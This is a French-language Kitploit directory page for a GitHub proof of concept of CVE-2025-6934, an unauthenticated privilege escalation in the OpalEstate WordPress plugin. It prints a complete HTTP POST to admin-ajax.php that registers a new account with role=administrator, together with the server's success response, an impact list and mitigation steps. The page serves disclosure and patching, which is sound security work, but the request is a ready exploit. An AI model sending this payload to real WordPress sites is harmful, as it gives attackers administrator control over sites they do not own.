Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6934 — CVE-2025-6934 POC | Kitploit
Outils/GitHubGitHub/mrjhaxcore/cve-2025-6934
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmrjhaxcore/cve-2025-6934

CVE-2025-6934

CVE-2025-6934 POC

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 Plugin WordPress OpalEstate - Vulnérabilité d'élévation de privilèges non authentifiée

🔎 Description

Le plugin OpalEstate pour WordPress contient une vulnérabilité critique dans son gestionnaire d'inscription AJAX, permettant à des utilisateurs non authentifiés de s'inscrire en tant qu'administrateurs.

Le problème réside dans la gestion non sécurisée du paramètre role dans l'action AJAX opalestate_register_form, qui est exposée publiquement via admin-ajax.php. Un attaquant disposant d'un nonce valide peut élever ses privilèges en soumettant simplement le champ role=administrator, entraînant une compromission totale du site.

Identifiant CVE : CVE-2025-6934 Score CVSS : 9.8 (Critique) Publié : 30 juin 2025

📋 Point de terminaison vulnérable / POC

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 231 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99" sec-ch-ua-mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/wordpress/?page_id=16 Accept-Encoding: gzip, deflate, br Cookie: wp-settings-time-1=1750938057; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; kawuda_cookie=1751024383267404614; PHPSESSID=rsbi6r8gs523c35v319f1jf4tt Connection: keep-alive

username=mrjtest&email=mrjtest%40gmail.com&password=123&password1=123&role=administrator&confirmed_register=on&opalestate-register-nonce=db20fa048c&_wp_http_referer=%2Fwordpress%2F%3Fpage_id%3D16&ajax=1&action=opalestate_register_form

Réponse

HTTP/1.1 200 OK Date: Wed, 02 Jul 2025 14:19:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Pragma: no-cache Content-Length: 53 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8

{"status":true,"redirect":"/wordpress/?page_id=16"}

Impact

Reprise totale du site WordPress Création de compte administrateur non authentifié Accès persistant par porte dérobée Potentiel de chaînage de privilèges et d'exploitation de plugins/thèmes

🛡️ Atténuation Supprimez ou assainissez le paramètre role des entrées contrôlées par l'utilisateur. Forcez l'attribution du rôle côté serveur (par exemple, abonné uniquement). Utilisez wp_insert_user() ou wp_create_user() avec des rôles verrouillés. Validez les capacités des utilisateurs avant de traiter les actions sensibles. Corrigez le plugin ou désactivez l'inscription AJAX si elle n'est pas essentielle.

PAR MRJ HAXCORE

Télécharger l’outil